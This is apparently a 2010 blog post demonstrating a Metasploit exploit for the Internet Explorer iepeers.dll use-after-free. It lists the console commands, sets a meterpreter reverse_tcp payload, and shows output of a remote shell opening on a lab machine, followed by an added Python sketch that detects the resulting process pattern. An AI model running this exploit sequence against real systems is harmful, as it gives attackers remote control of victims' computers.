Wednesday, March 10, 2010

Metasploit Demo: Microsoft Internet Explorer iepeers.dll Use After Free

Here's a quick Metasploit demo of the latest Internet Explorer 6/7 0day:

msf > use windows/browser/ie_iepeers_pointer
msf exploit(ie_iepeers_pointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_iepeers_pointer) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(ie_iepeers_pointer) > exploit
[*] Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 10.0.0.1:4444
[*] Using URL: http://0.0.0.0:8080/JOk5k9hl
[*] Local IP: http://192.168.1.102:8080/JOk5k9hl
[*] Server started.
[*] Sending Microsoft Internet Explorer iepeers.dll Use After Free to 10.0.0.2:1038...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1039)
[*] Session ID 1 (10.0.0.1:4444 -> 10.0.0.2:1039) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1892)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1148
[*] New server process: notepad.exe (1148)

msf exploit(ie_iepeers_pointer) > sessions

Active sessions
===============

  Id  Type         Information                     Connection
  --  ----         -----------                     ----------
  1   meterpreter  LAB\Administrator @ LAB (1892)  10.0.0.1:4444 -> 10.0.0.2:1039

msf exploit(ie_iepeers_pointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: LAB
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
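
Seen from the target, the output above leaves a recognizable trail: iexplore.exe (1892) connects back to 10.0.0.1:4444, then spawns notepad.exe (1148) for the 'migrate -f' step. The following is an added example, not part of the original post or of Metasploit: a small correlation over constructed process and network events that flags that pattern. The event schema, the port list and the process lists are assumptions.

```python
# Added detection sketch. The event records are constructed sample data in a
# hypothetical schema; PIDs, hosts and ports mirror the console output above.
BROWSERS = {"iexplore.exe"}
# Assumed list: programs a browser has no normal reason to launch.
UNEXPECTED_CHILDREN = {"notepad.exe"}
# Assumed list: destination ports considered normal for browser traffic.
WEB_PORTS = {80, 443, 8080}

EVENTS = [  # constructed
    {"type": "proc_create", "pid": 1892, "image": "iexplore.exe", "ppid": 1500, "parent": "explorer.exe"},
    {"type": "net_connect", "pid": 1892, "image": "iexplore.exe", "dst": "10.0.0.1", "dport": 8080},
    {"type": "net_connect", "pid": 1892, "image": "iexplore.exe", "dst": "10.0.0.1", "dport": 4444},
    {"type": "proc_create", "pid": 1148, "image": "notepad.exe", "ppid": 1892, "parent": "iexplore.exe"},
    # Benign control: notepad.exe started by the user from the shell.
    {"type": "proc_create", "pid": 2200, "image": "notepad.exe", "ppid": 1500, "parent": "explorer.exe"},
]


def detect(events):
    """Flag a browser spawning an unexpected child process.

    Severity is 'high' when the same browser PID earlier connected to a port
    outside WEB_PORTS, otherwise 'medium'.
    """
    odd_conns = {}  # browser pid -> [(dst, dport), ...] outside WEB_PORTS
    alerts = []
    for ev in events:
        image = ev["image"].lower()
        if ev["type"] == "net_connect" and image in BROWSERS:
            if ev["dport"] not in WEB_PORTS:
                odd_conns.setdefault(ev["pid"], []).append((ev["dst"], ev["dport"]))
        elif (ev["type"] == "proc_create"
              and ev["parent"].lower() in BROWSERS
              and image in UNEXPECTED_CHILDREN):
            conns = odd_conns.get(ev["ppid"], [])
            alerts.append({
                "parent_pid": ev["ppid"],
                "child_pid": ev["pid"],
                "child": ev["image"],
                "severity": "high" if conns else "medium",
                "prior_connections": conns,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The migration reuses the session already opened by the browser process, so the rule keys on the parent/child relationship and the browser's earlier connection rather than on a new connection from notepad.exe.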

References:

Microsoft Internet Explorer 'iepeers.dll' Remote Code Execution Vulnerability
